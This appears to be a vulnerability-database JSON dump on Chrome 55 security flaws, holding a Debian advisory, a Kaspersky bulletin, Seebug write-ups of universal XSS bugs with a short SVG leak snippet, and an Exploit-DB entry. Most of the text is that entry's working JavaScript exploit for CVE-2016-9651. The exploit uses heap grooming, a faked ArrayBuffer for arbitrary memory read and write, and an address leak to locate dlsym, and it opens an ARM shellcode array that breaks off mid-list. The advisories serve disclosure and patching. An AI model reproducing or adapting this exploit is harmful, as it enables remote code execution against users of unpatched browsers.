Jonathan Birch discovered a file download protection bypass.\n\nCVE-2016-5215\n\n Looben Yang discovered a use-after-free issue.\n\nCVE-2016-5216\n\n A use-after-free issue was discovered in the pdfium library.\n\nCVE-2016-5217\n\n Rob Wu discovered a condition where data was not validated by\n the pdfium library.\n\nCVE-2016-5218\n\n Abdulrahman Alqabandi discovered a URL spoofing issue.\n\nCVE-2016-5219\n\n Rob Wu discovered a use-after-free issue in the v8 javascript\n library.\n\nCVE-2016-5220\n\n Rob Wu discovered a way to access files on the local system.\n\nCVE-2016-5221\n\n Tim Becker discovered an integer overflow issue in the angle\n library.\n\nCVE-2016-5222\n\n xisigr discovered a URL spoofing issue.\n\nCVE-2016-5223\n\n Hwiwon Lee discovered an integer overflow issue in the pdfium\n library.\n\nCVE-2016-5224\n\n Roeland Krak discovered a same-origin bypass in SVG image handling.\n\nCVE-2016-5225\n\n Scott Helme discovered a Content Security Protection bypass.\n\nCVE-2016-5226\n\n Jun Kokatsu discovered a cross-scripting issue.\n\nCVE-2016-9650\n\n Jakub \u00c5\u00bboczek discovered a Content Security Protection information\n disclosure.\n\nCVE-2016-9651\n\n Guang Gong discovered a way to access private data in the v8\n javascript library.\n\nCVE-2016-9652\n\n The chrome development team found and fixed various issues during\n internal auditing.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 55.0.2883.75-1~deb8u1.\n\nFor the testing distribution (stretch), these problems will be fixed soon.\n\nFor the unstable distribution (sid), these problems have been fixed in\nversion 55.0.2883.75-1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org\n", "modified": "2016-12-11T21:39:21", "published": "2016-12-11T21:39:21", "id": "DEBIAN:DSA-3731-1:02966", "href": "https://lists.debian.org/debian-security-announce/debian-security-announce-2016/msg00314.html", "title": "[SECURITY] [DSA 3731-1] chromium-browser security update", "type": "debian", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "kaspersky": [{"lastseen": "2019-03-21T00:14:09", "bulletinFamily": "info", "description": "### *Detect date*:\n01/19/2017\n\n### *Severity*:\nHigh\n\n### *Description*:\nMultiple serious vulnerabilities have been found in Google Chrome prior to 55.0.2883.75. Malicious users can exploit these vulnerabilities to bypass security restrictions, make code injections and possibly cause denial of service, obtain sensitive information.\n\n### *Affected products*:\nGoogle Chrome earlier than 55.0.2883.75 (all branches)\n\n### *Solution*:\nUpdate to the latest version. File with name old_chrome can be still detected after update. It caused by Google Chrome update policy which does not remove old versions when installing updates. Try to contact vendor for further delete instructions or ignore such kind of alerts at your own risk. \n[Google Chrome download page](<https://www.google.com/chrome/browser/desktop/>)\n\n### *Original advisories*:\n[Stable Channel Update for Desktop](<https://chromereleases.googleblog.com/2016/12/stable-channel-update-for-desktop.html>) \n\n\n### *Impacts*:\nOSI \n\n### *Related products*:\n[Google Chrome](<https://threats.kaspersky.com/en/product/Google-Chrome/>)\n\n### *CVE-IDS*:\n[CVE-2016-5205](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5205>)4.3High \n[CVE-2016-5204](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5204>)4.3High \n[CVE-2016-5203](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5203>)6.8High \n[CVE-2016-9650](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-9650>)4.3High", "modified": "2019-03-07T00:00:00", "published": "2017-01-19T00:00:00", "id": "KLA10949", "href": "https://threats.kaspersky.com/en/vulnerability/KLA10949", "title": "\r KLA10949Multiple vulnerabilities in Google Chrome ", "type": "kaspersky", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "seebug": [{"lastseen": "2017-11-19T11:59:25", "bulletinFamily": "exploit", "description": "VULNERABILITY DETAILS From /third_party/WebKit/Source/core/dom/Fullscreen.cpp:\n\n`void Fullscreen::didEnterFullscreenForElement(Element* element) { (...) // FIXME: This should not call updateStyleAndLayoutTree. document()->updateStyleAndLayoutTree(); (...) }`\n\nIndeed. |didEnterFullscreenForElement| may be called in the middle of a DOM node removal if the node being removed is the active the fullscreen element and there are other fullscreen elements on the Fullscreen::m_fullscreenElementStack (see Fullscreen::exitFullscreen()). In specific circumstances, when the document's focused node is in a shadow tree with a scheduled update, this synchronous layout update may result in events being dispatched at a wrong time, which allows an attacker to corrupt the DOM tree.\n\n#### VERSION\n\nChrome 54.0.2840.59 (Stable) \nChrome 54.0.2840.59 (Beta) \nChrome 55.0.2883.11 (Dev) \nChromium 56.0.2890.0 (Release build compiled today)\n\nAttachment: [exploit.zip](<http://paper.seebug.org/papers/Archive/poc/CVE-2016-5207/exploit.zip>)\n", "modified": "2017-04-21T00:00:00", "published": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93000", "id": "SSV:93000", "type": "seebug", "title": "Chrome Universal XSS via fullscreen element updates (CVE-2016-5207)", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T11:59:27", "bulletinFamily": "exploit", "description": "#### VULNERABILITY DETAILS\n\nWhen an input element is removed, the popup is closed during the layout tree detach:\n\n`void HTMLInputElement::detachLayoutTree(const AttachContext& context) { HTMLTextFormControlElement::detachLayoutTree(context); m_needsToUpdateViewValue = true; m_inputTypeView->closePopupView(); }`\n\nIf the chooser is still being displayed, its associated popup is torn down and the client (ColorChooserPopupUIController for inputs of type \"color\") is notified:\n\n`void WebPagePopupImpl::closePopup() { // This function can be called in EventDispatchForbiddenScope for the main // the document, and the following operations dispatch some events. It's safe // because web authors can't listen to the events. EventDispatchForbiddenScope::AllowUserAgentEvents allowEvents; (...) m_popupClient->didClosePopup(); m_webView->cleanupPagePopup(); }`\n\nThe notification is propagated back to the input type, which may dispatch a change event to the input element if its value has changed recently:\n\n`void ColorInputType::didEndChooser() { EventQueueScope scope; if (LayoutTheme::theme(). isModalColorChooser()) element(). dispatchFormControlChangeEvent(); m_chooser. clear(); }`\n\nAn attacker can exploit this synchronous event to corrupt the DOM tree.\n\n#### VERSION\n\nChrome 54.0.2840.59 (Stable) \nChrome 55.0.2883.21 (Beta) \nChrome 56.0.2896.3 (Dev) \nChromium 56.0.2899.0 (Release build compiled today)\n\nAttachment: [exploit.zip](<http://paper.seebug.org/papers/Archive/poc/CVE-2016-5208.zip>)\n", "modified": "2017-04-21T00:00:00", "published": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-92999", "id": "SSV:92999", "type": "seebug", "title": "Chrome Universal XSS using an <input type=\"color\"> element (CVE-2016-5208)", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}, {"lastseen": "2017-11-19T11:59:40", "bulletinFamily": "exploit", "description": "#### VULNERABILITY DETAILS\n\nWhen an event is dispatched to an element in a SVG shadow tree, the Event::currentTarget returns the original corresponding node, but the Event::target doesn't make any attempt to redirect access. Therefore, the tree can be trivially leaked like this:\n\n`<svg> <g id=\"a\"> <image href=\"\" onerror=\"if (event. currentTarget !== event. target) {alert(event. target. parentNode. parentNode)}\"> </g> <use href=\"#a\"> </svg>`\n\nGaining access to the internal shadow tree allows an attacker to manipulate it in a way that allows triggering focus events in theoretically impossible circumstances, which may lead to the DOM tree corruption.\n\n#### VERSION\n\nChrome 52.0.2743.82 (Stable) \nChrome 52.0.2743.82 (Beta) \nChrome 53.0.2785.21 (Dev) \nChromium 54.0.2806.0 (Release build compiled today)\n\nAttachment: [exploit.zip](<http://paper.seebug.org/papers/Archive/poc/CVE-2016-5204.zip>)\n", "modified": "2017-04-21T00:00:00", "published": "2017-04-21T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-93001", "id": "SSV:93001", "type": "seebug", "title": "Chrome Universal XSS by intercepting a UA shadow tree(CVE-2016-5204)", "sourceData": "", "sourceHref": "", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "exploitdb": [{"lastseen": "2017-06-14T22:14:23", "bulletinFamily": "exploit", "description": "Google Chrome - V8 Private Property Arbitrary Code Execution. CVE-2016-9651. Remote exploit for Android platform", "modified": "2017-06-14T00:00:00", "published": "2017-06-14T00:00:00", "id": "EDB-ID:42175", "href": "https://www.exploit-db.com/exploits/42175/", "type": "exploitdb", "title": "Google Chrome - V8 Private Property Arbitrary Code Execution", "sourceData": "<html>\r\n// Source: https://github.com/secmob/pwnfest2016/\r\n<script>\r\nfunction exploit(){\r\n\r\nfunction to_hex(num){\r\n return (num>>>0).toString(16);\r\n}\r\nfunction intarray_to_double(int_arr){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n uBuf[0]=int_arr[0];\r\n uBuf[1]=int_arr[1];\r\n return dBuf[0];\r\n}\r\n\r\nfunction str_to_double(str){//leng of str must be 8\r\n var dBuf = new Float64Array(1);\r\n var u8Buf = new Uint8Array(dBuf.buffer);\r\n for(var i=0;i<str.length;i++){\r\n u8Buf[i] = str.charCodeAt(i);\r\n }\r\n return dBuf[0];\r\n}\r\nfunction double_to_array(value){\r\n var uBuf = new Uint32Array(2);\r\n var dBuf = new Float64Array(uBuf.buffer);\r\n dBuf[0]=value;\r\n return uBuf;\r\n}\r\n\r\nfunction gc(){\r\n for(var i=0;i<0x100000/16;i++){\r\n new String;\r\n }\r\n}\r\nfunction getHiddenValue(){\r\n var obj = {};\r\n var oob = \"/re/\";\r\n //oob = oob.replace(\"re\",\"*\".repeat(0x2000));\r\n oob = oob.replace(\"re\",\"*\".repeat(0x100000));\r\n var str = 'class x extends Array{'+oob+\"}\";\r\n var fun = eval(str);\r\n Object.assign(obj,fun);\r\n return obj;\r\n}\r\nvar obWin;\r\nfunction makeOobString(){\r\n var hiddenValue = getHiddenValue();\r\n var magicStr = \"bbbb\";\r\n var arr=[];\r\n var str = 'class x extends Array{}';\r\n for(var i=0;i<str.length;i++){\r\n arr[i]=str.charCodeAt(i);\r\n }\r\n var ob = new Array(0x200);\r\n ob.fill(0x31313131);\r\n gc();\r\n gc();\r\n str=String.fromCharCode.apply(null,arr);\r\n ob=ob.concat(0x32323232);\r\n var fun = eval(str); \r\n ob[2]=str;\r\n ob[3]=ob;\r\n Object.assign(fun,hiddenValue);\r\n var oobString = fun.toString();\r\n gc();\r\n gc();\r\n print(\"begin search\");\r\n var subStr = oobString.substr(0,0x8000);\r\n var pos = subStr.indexOf(magicStr);\r\n print(\"end search\");\r\n if(pos==-1){\r\n print(\"find magic failed\");\r\n postMessage(false);\r\n self.close();\r\n print(\"unpossible\");\r\n throw \"error\";\r\n }else{\r\n print(\"find magic at \"+pos);\r\n\r\n }\r\n oobString = oobString.substr(pos,ob.length*4);\r\n obWin=ob;\r\n return oobString;\r\n}\r\nvar oobString = makeOobString();\r\nprint(\"get oob string successfully\");\r\nfunction print(){\r\n console.log.apply(null,arguments);\r\n /*document.write('<p >');\r\n document.write.apply(document,arguments);\r\n document.write(\"<p>\");*/\r\n}\r\nfunction str2arr(str,len){//len must be multile of 4\r\n if(len===undefined)\r\n len = str.length;\r\n var u8a = new Uint8Array(len);\r\n for(var i=0;i<len;i++){\r\n u8a[i] = str.charCodeAt(i);\r\n }\r\n return new Uint32Array(u8a.buffer);\r\n}\r\nfunction pArrayInHex(arr){\r\n var result=\"<p style='font-size:8px'>\";\r\n for(var i=0;i<arr.length;i++){\r\n result+=(arr[i]+0x100000000).toString(16).substr(-8);\r\n result+=\" \";\r\n if(i%8==7)\r\n result+=\"<p style='font-size:8px'>\";\r\n }\r\n result+=\"<p>\";\r\n print(result);\r\n //alert(result);\r\n return result;\r\n}\r\nfunction pStrInHex(str){\r\n //var result=\"<p style='font-size:8px'>\";\r\n var result=\"\\n\";\r\n for(var i=0;i<str.length;i++){\r\n var code = str.charCodeAt(i);\r\n result+=(code+0x100).toString(16).substr(-2);\r\n if(i%4==3)\r\n result+=\" \";\r\n if(i%32==31)\r\n // result+=\"<p style='font-size:8px'>\";\r\n result+=\"\\n\";\r\n }\r\n // result+=\"<p>\";\r\n result+=\"\\n\";\r\n print(result);\r\n return result;\r\n}\r\nfunction getObjAddr(obj){\r\n obWin[0]=obj;\r\n var value2= ((str2arr(oobString,4))[0]);\r\n return value2>>>0;\r\n}\r\n\r\nvar getObj24BitsAddr = function(){\r\n var smi=0;\r\n var code = 0;\r\n var i=0;\r\n //don't allocate heap object\r\n function getAddr(obj){\r\n obWin[0]=obj;\r\n value=0;\r\n code = 0;\r\n i=0;\r\n for(i=2;i>=0;i--){\r\n code = oobString.charCodeAt(i);\r\n value = code+value*256;\r\n }\r\n return value;\r\n }\r\n return getAddr;\r\n}();\r\n\r\n\r\nvar lengthInOldSpace = 0xfffffffc;\r\nvar abarr=new Array(800);\r\nfunction sprayVM(){\r\n var i=0;\r\n var j=0;\r\n try{\r\n for(i=0;i<20;i++){\r\n var u8 = new Uint8Array(0x10000000-0x500);\r\n abarr[i]=u8;\r\n }\r\n }catch(e){}\r\n try{\r\n for(j=0;j<100;j++){\r\n var u8 = new Uint8Array(0x8000000-0x500);\r\n abarr[i+j]=u8;\r\n }\r\n }catch(e){}\r\n print(\"allocate \"+i+\" 256M \"+j+\" 16M \")\r\n function getRandomInt(min, max) {\r\n min = Math.ceil(min);\r\n max = Math.floor(max);\r\n return Math.floor(Math.random() * (max - min)) + min;\r\n }\r\n delete abarr[getRandomInt(0,i)];\r\n}\r\n\r\n\r\nfunction getNewSpaceAddrs(){\r\n /*var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";*/\r\n var objsInNewSpace = new Array(80);\r\n for(var i=0;i<objsInNewSpace.length;i++){\r\n //var xx=escape(str);\r\n var xx = new Array(0x70000/4);\r\n objsInNewSpace[i]=(getObjAddr(xx)&0xfff00000)>>>0;\r\n //\u4f7fnewspace\u66f4\u79bb\u6563\r\n new Uint8Array(0x100000-0x500);\r\n new Uint8Array(0x100000-0x500);\r\n }\r\n function compareNumbers(a, b) {\r\n return a - b;\r\n }\r\n objsInNewSpace = Array.from(new Set(objsInNewSpace));\r\n objsInNewSpace = objsInNewSpace.sort(compareNumbers);\r\n return objsInNewSpace;\r\n}\r\n\r\n\r\nprint(\"begin get new space address\");\r\nvar objsInNewSpace = getNewSpaceAddrs();\r\nwhile(objsInNewSpace.length<16){\r\n objsInNewSpace = getNewSpaceAddrs();\r\n print(\"new space addresses\");\r\n pArrayInHex(objsInNewSpace);\r\n}\r\n\r\ntry{\r\nsprayVM();\r\n}catch(e){}\r\n\r\nvar selectedTrunk = 0;\r\nvar selectedStr = \"\";\r\nfunction bruteForceFengShui(){\r\n var huge_str = \"x\".repeat(0x100000-0x9000);//-0x9000\r\n huge_str +=\"%\";\r\n var hold = new Array(100);\r\n //var holdaddress = new Array(100);\r\n for(var i=0;;i++){\r\n var large = escape(huge_str);\r\n var addr = getObjAddr(large);\r\n //console.log(addr.toString(16) + \" \"+i);\r\n if(i<hold.length){\r\n hold[i]=large;\r\n //holdaddress[i]=addr;\r\n }\r\n addr=(addr&0xfff00000)>>>0;\r\n addr = addr-0x100000;\r\n if(objsInNewSpace.indexOf(addr)!=-1){\r\n selectedTrunk = addr;\r\n selectedStr = large;\r\n abarr.fill(1);\r\n hold.fill(1);\r\n //holdaddress.fill(1);\r\n break;\r\n }\r\n if(i===150){\r\n /*i=0;\r\n print(\"tried 200 times\");\r\n abarr.fill(1);\r\n try{\r\n sprayVM();\r\n }catch(e){};*/\r\n postMessage(false);\r\n close();\r\n throw \"exceed limits\";\r\n }\r\n }\r\n}\r\nbruteForceFengShui();\r\n//to avoid allocate memory latter, initilize here\r\nvar nextTrunk = selectedTrunk + 0x100000;\r\n\r\n//\u751f\u6210\u4e00\u5757\u8db3\u591f\u5927\u7684\u53ef\u8bfb\u5199\u5185\u5b58\r\nvar huge_str = \"eval('');\";\r\n//8000\u4e0d\u80fd\u592a\u5927\uff0c\u592a\u5927\u4f1a\u4f7fnew_space\u589e\u5927\r\nfor(var i=0;i<8000;i++) huge_str += 'a.a;';\r\nhuge_str += \"return 10;\";\r\nvar huge_func = new Function('a',huge_str);\r\nhuge_func({});\r\n\r\nfunction fillNewSpace(origObj){\r\n //first object in new space at 0x8100, new spaces layout\r\n //0x40000\r\n //0x37f00\r\n //.....\r\n //0x40000\r\n var gap = \"g\".repeat(0x37f00-12-3);//12 is head of string,3 %25\r\n var gap = gap+\"%\";\r\n //flat gap\r\n gap.substr(0,100);\r\n var fillstr = \"%20a\".repeat((0x40000-12)/4);\r\n fillstr = escape(fillstr);\r\n var addr=0;\r\n for(var i=0;i<0x100;i++){\r\n addr = getObj24BitsAddr(origObj);\r\n if((addr&0xfffff)===0x8101)\r\n origObj=escape(gap);\r\n else\r\n origObj=unescape(fillstr);\r\n }\r\n}\r\n\r\nfunction findNewSpace(){\r\n var kMaxRegularHeapObjectSize =523776;// 507136;\r\n var str=\"1\".repeat(kMaxRegularHeapObjectSize-0x2000);\r\n str+=\"%\";\r\n for(var i=0;;i++){\r\n var xx=escape(str);\r\n var straddr = getObjAddr(xx);\r\n addr=(straddr&0xfff00000)>>>0;\r\n if(addr===selectedTrunk){\r\n print(\"good state \"+straddr.toString(16));\r\n break;\r\n }\r\n }\r\n}\r\n\r\nfunction myencode(str){\r\n var arr = [];\r\n for(var i=0;i<str.length;i++){\r\n if(i%2==1)\r\n arr.push(str.charCodeAt(i));\r\n else{\r\n arr.push(37);//%\r\n var hexstr = (str.charCodeAt(i)+0x100).toString(16).substr(-2);\r\n arr.push(hexstr.charCodeAt(0));\r\n arr.push(hexstr.charCodeAt(1));\r\n }\r\n }\r\n return String.fromCharCode.apply(null,arr);\r\n}\r\n\r\nvar dArray = [];\r\nvar index = (0x8100-36)*2;\r\nfor(var i=0;i<0x20000/8;i++){\r\n dArray[i]=str_to_double(\"%03x%03x\");\r\n}\r\n\r\nvar occulen = 0;\r\nvar i = 0;\r\nvar savedChunk = new Uint8Array(0x8100);\r\nvar hiddenValue = getHiddenValue();\r\nvar arr=[];\r\nfillNewSpace(new String);\r\nfindNewSpace();\r\nvar classStr = 'class x extends Array{}';\r\nfor(var i=0;i<classStr.length;i++){\r\n arr[i]=classStr.charCodeAt(i);\r\n}\r\nvar magicStr = String.fromCharCode(0x86,0x24);\r\nclassStr=String.fromCharCode.apply(null,arr);\r\nvar ab = new ArrayBuffer(0x1243);\r\nvar fun = eval(classStr); \r\nObject.assign(fun,hiddenValue);\r\nvar oobStr = fun.toString();\r\n\r\n/*(gdb) x/20xw 0x5600c45c array buffer layout\r\n * 0x5600c45c: 0x4b009a9d 0x41008125 0x41008125 0x00000020\r\n * 0x5600c46c: 0x09fda368 0x00000004 0x00000000 0x00000000\r\n */\r\n//overwrite huge string as array buffer\r\nvar abLengthIndex = oobStr.indexOf(magicStr);\r\nvar strArrayBuffer = oobStr.substr(abLengthIndex-12,32);\r\n//replace the byteLength\r\nvar LengthAddr = getObjAddr(lengthInOldSpace);\r\nvar strLength = String.fromCharCode(0xff&LengthAddr,(0xff00&LengthAddr)>>8,(0xff0000&LengthAddr)>>16,(0xff000000&LengthAddr)>>24);\r\nvar strBase = \"\\x00\\x00\\x00\\x00\";\r\nstrArrayBuffer = strArrayBuffer.substr(0,12)+strLength+strBase+strArrayBuffer.substr(20,12);\r\nstrArrayBuffer = myencode(strArrayBuffer);\r\nfor(var i=0;i<strArrayBuffer.length/8;i++){\r\n var d = strArrayBuffer.substr(i*8,8);\r\n dArray[index/8+i] = str_to_double(d);\r\n}\r\n\r\nvar classStrAddr = getObjAddr(classStr)>>>0;\r\n//set read position\r\nvar readOffset = 0x100000-((classStrAddr-1)&0xfffff)-12-0x40000;//12 string head\r\n//length control the length of unscaped string, generated string has 12 bytes head\r\n//left 0x1000*2 bytes to avoid gc\r\nvar subOobStr = oobStr.substr(readOffset,0x40000-24-0x2000);\r\n\r\n//save the the chunk head to be corrupted\r\nvar nextThunkOffset = 0x100000-((classStrAddr-1)&0xfffff)-12;\r\nvar savedThunkStr = oobStr.substr(nextThunkOffset,0x8100);\r\nfor(var i =0;i<savedThunkStr.length;i++){\r\n savedChunk[i] = savedThunkStr.charCodeAt(i);\r\n}\r\n\r\nvar pos1=new String;\r\nvar pos1addr = getObj24BitsAddr(pos1)-1;\r\n\r\n//0x10 size of JSArray, 0x10 size of String head, 8 ALLOCATION_MEMENTO_TYPE 8 fixedarray \r\nocculen =0x100000-((pos1addr+0x10+0x10+0x8+0x8)&0xfffff);\r\n//minus the length of double array\r\nif(occulen<0x40000+16+8)\r\n throw \"no enough room\";\r\nocculen = occulen - 0x40000-16-8;//16 size of JSArray, 8 fixedarray\r\nif(occulen%4!==0)\r\n throw \"length don't align\";\r\nvar arrocc=new Array((occulen/4)); \r\n//set unescape write position\r\nvar occDoubleArray = dArray.concat();\r\n\r\nvar b=unescape(subOobStr);\r\n//restore the corrupted chunk head\r\nvar u8 = new Uint8Array(selectedStr,nextTrunk,0x8100);\r\nfor(var i=0;i<savedChunk.length;i++){\r\n u8[i] = savedChunk[i];\r\n}\r\n\r\nprint(\"long string allocated at \"+classStrAddr.toString(16));\r\nif(typeof(selectedStr)===\"string\"){\r\n print(\"overwrite failed\");\r\n postMessage(false);\r\n close();\r\n return;\r\n //throw \"overwrite failed\";\r\n}\r\nvar fakeab = selectedStr;\r\nprint(\"faked array buffer byte length is \"+fakeab.byteLength.toString(16));\r\nvar globaldv = new Uint32Array(fakeab);\r\n\r\nfunction read_uint32(from_address){\r\n var u32 = globaldv[(from_address/4)>>>0];\r\n return u32>>>0;\r\n}\r\n\r\n\r\nfunction read_uint8(from_address){\r\n from_address = from_address>>>0;\r\n var index = (from_address/4)>>>0;\r\n var mask = from_address%4;\r\n var u32 = globaldv[index];\r\n u32 = u32<<8*(3-mask);\r\n return u32>>>24;\r\n}\r\n\r\nfunction read_uint32_unalign(from_address){\r\n var u32 = 0;\r\n for(var i=3;i>=0;i--){\r\n var u8 = read_uint8(from_address+i);\r\n u32 = u32*0x100+u8;\r\n }\r\n return u32>>>0;\r\n}\r\n\r\n//rw to execute\r\n//get function point of v8::internal::Accessors::ReconfigureToDataProperty\r\nfunction getFixedFunctionPoint(fakeab){\r\n var FunctionAddress = getObjAddr(Function);\r\n var u32 = new Uint32Array(fakeab,FunctionAddress-1,0x1000);\r\n var map = u32[0];\r\n u32 = new Uint32Array(fakeab,map-1,0x1000);\r\n //instance descriptors\r\n var descriptors = u32[7];\r\n u32 = new Uint32Array(fakeab,descriptors-1,0x1000);\r\n var lengthAccessorInfo = u32[6];\r\n u32 = new Uint32Array(fakeab,lengthAccessorInfo-1,0x1000);\r\n var setterForeign = u32[4];\r\n u32 = new Uint32Array(fakeab,setterForeign-1,0x1000);\r\n var functionPoint = u32[1];\r\n return functionPoint-1;\r\n}\r\n\r\nvar funPoint = getFixedFunctionPoint(fakeab);\r\nprint(\"ReconfigureToDataProperty at\"+funPoint.toString(16));\r\nvar pattern=[0x03,0x46,0x18,0xb1,0x20,0x46,0x98,0x47,0x04,0x46];//get_elf_hwcap_from_getauxval\r\n\r\nvar point = ((funPoint&~0xfff)-0xdb6000)>>>0;//cf0000\r\nprint(\"chrome.apk base at \"+point.toString(16));\r\n\r\nfunction find(startAddr,len,pattern){\r\n for(var i=0; i<(len-pattern.length); i++ ) {\r\n for(var j=0;j<pattern.length;j++){\r\n var temp = read_uint8(startAddr+i+j);\r\n //print(temp.toString(16));\r\n if(temp!=pattern[j]) break;\r\n }\r\n if(j==pattern.length) return startAddr+i;\r\n }\r\n print(\"find failed\");\r\n}\r\nvar pattern_position=find(point,0x10000000,pattern);\r\n\r\nprint(\"find pattern at \"+to_hex(pattern_position));\r\n\r\n\r\n\r\n\r\n\r\nfunction get_dest_from_blx(addr) {\r\n var val = read_uint32_unalign(addr);\r\n var s = (val & 0x400) >> 10;\r\n var i1 = 1 - (((val & 0x20000000) >> 29) ^ s);\r\n var i2 = 1 - (((val & 0x8000000) >> 27) ^ s);\r\n var i10h = val & 0x3ff;\r\n var i10l = (val & 0x7fe0000) >> 17;\r\n var off = ((s * 0xff) << 24) | (i1 << 23) | (i2 << 22) | (i10h << 12) | (i10l << 2);\r\n return ((addr + 4) & ~3) + off;\r\n}\r\n\r\nfunction backup_original_code(start_address){\r\n var backup_arr = [];\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n backup_arr[i]=u8arr[i];\r\n }\r\n return backup_arr;\r\n}\r\n\r\nfunction restore_original_code(start_address,backup_arr){\r\n set_access_address(start_address);\r\n var u8arr=new Uint8Array(faked_ab);\r\n for(var i=0;i<shellcode.length+4096;i++){\r\n u8arr[i]=backup_arr[i];\r\n }\r\n}\r\n\r\n\r\nhuge_func({});\r\nprint(\"blx instruction content is \"+to_hex(read_uint32_unalign(pattern_position-4)));\r\nvar dlsym_addr = get_dest_from_blx(pattern_position-4);\r\nprint(\"dlsym address is \"+to_hex(dlsym_addr));\r\nvar huge_func_address = getObjAddr(huge_func)-1;\r\nprint(\"huge func address is \"+to_hex(huge_func_address));\r\nfor(var i=0;i<20;i++){\r\n print(to_hex(read_uint32(huge_func_address+i*4)));\r\n}\r\nvar huge_func_code_entry = read_uint32(huge_func_address+7*4);//dynamic kCodeEntryOffset 3*4\r\nprint(\"huge func code entry is \"+to_hex(huge_func_code_entry));\r\nprint(to_hex(read_uint32(huge_func_code_entry)));\r\n\r\n//var so_str= \"\";\r\nvar shellcode = [0xf0,0x4f,0x2d,0xe9,0x79,0x30,0xa0,0xe3,0x8c,0x0b,0xdf,0xed,0x4b,0xdf,0x4d,0xe2,0x61,0x80,0xa0,0xe3,0x00,0x60,0xa0,0xe3,0x73,0x10,0xa0,0xe3,0x74,0x20,0xa0,0xe3,0x5f,0x90,0xa0,0xe3,0x61,0x30,0xcd,0xe5,0x65,0xa0,0xa0,0xe3,0x6d,0xb0,0xa0,0xe3,0x5b,0x30,0xcd,0xe5,0x6e,0xc0,0xa0,0xe3,0x6c,0x30,0xa0,0xe3,0xfa,0x80,0xcd,0xe5,0x64,0x70,0xa0,0xe3,0x72,0x50,0xa0,0xe3,0x60,0x10,0xcd,0xe5,0x6f,0x40,0xa0,0xe3,0x69,0xe0,0xa0,0xe3,0x62,0x10,0xcd,0xe5,0x67,0x80,0xa0,0xe3,0x5a,0x10,0xcd,0xe5,0x18,0x00,0x8d,0xe5,0x70,0x00,0xa0,0xe3,0x63,0x20,0xcd,0xe5,0x0a,0x21,0xcd,0xe5,0x64,0xa0,0xcd,0xe5,0x65,0xb0,0xcd,0xe5,0x5c,0xb0,0xcd,0xe5,0xf8,0x90,0xcd,0xe5,0xf9,0x90,0xcd,0xe5,0x01,0x91,0xcd,0xe5,0x05,0x91,0xcd,0xe5,0x20,0x90,0xa0,0xe3,0xfb,0xc0,0xcd,0xe5,0x09,0xc1,0xcd,0xe5,0xfc,0x70,0xcd,0xe5,0x00,0x71,0xcd,0xe5,0x58,0x70,0xcd,0xe5,0x78,0x70,0xa0,0xe3,0xfd,0x50,0xcd,0xe5,0x07,0x51,0xcd,0xe5,0xfe,0x40,0xcd,0xe5,0x03,0x41,0xcd,0xe5,0xff,0xe0,0xcd,0xe5,0x08,0xe1,0xcd,0xe5,0x02,0x31,0xcd,0xe5,0x59,0x30,0xcd,0xe5,0x66,0x60,0xcd,0xe5,0x0b,0x61,0xcd,0xe5,0x5d,0x60,0xcd,0xe5,0x04,0x81,0xcd,0xe5,0x25,0x80,0xa0,0xe3,0x1c,0x0b,0xcd,0xed,0xeb,0x10,0xcd,0xe5,0x18,0x10,0x9d,0xe5,0x9c,0x20,0xcd,0xe5,0x9f,0x20,0xcd,0xe5,0x18,0x20,0x9d,0xe5,0x98,0xb0,0xcd,0xe5,0x2c,0xb0,0xa0,0xe3,0x9d,0xa0,0xcd,0xe5,0xe8,0xe0,0xcd,0xe5,0x63,0xe0,0xa0,0xe3,0xe9,0xc0,0xcd,0xe5,0xe8,0xc0,0x8d,0xe2,0xed,0xa0,0xcd,0xe5,0x70,0xa0,0x8d,0xe2,0xee,0x30,0xcd,0xe5,0xef,0x30,0xcd,0xe5,0x68,0x30,0xa0,0xe3,0x34,0xc0,0x8d,0xe5,0x9e,0xe0,0xcd,0xe5,0xec,0x30,0xcd,0xe5,0x06,0x01,0xcd,0xe5,0x99,0x00,0xcd,0xe5,0x06,0x00,0xa0,0xe1,0x9a,0x50,0xcd,0xe5,0x00,0x50,0x91,0xe5,0x06,0x10,0xa0,0xe1,0x9b,0x40,0xcd,0xe5,0x04,0x40,0x92,0xe5,0x38,0xa0,0x8d,0xe5,0xea,0x90,0xcd,0xe5,0xf0,0x90,0xcd,0xe5,0xf1,0x80,0xcd,0xe5,0xf4,0x80,0xcd,0xe5,0xf2,0x70,0xcd,0xe5,0xf5,0x70,0xcd,0xe5,0xf3,0xb0,0xcd,0xe5,0xa0,0x60,0xcd,0xe5,0xf6,0x60,0xcd,0xe5,0x35,0xff,0x2f,0xe1,0x10,0x00,0x8d,0xe5,0x58,0x10,0x8d,0xe2,0x34,0xff,0x2f,0xe1,0x1c,0x00,0x8d,0xe5,0xf8,0x10,0x8d,0xe2,0x10,0x00,0x9d,0xe5,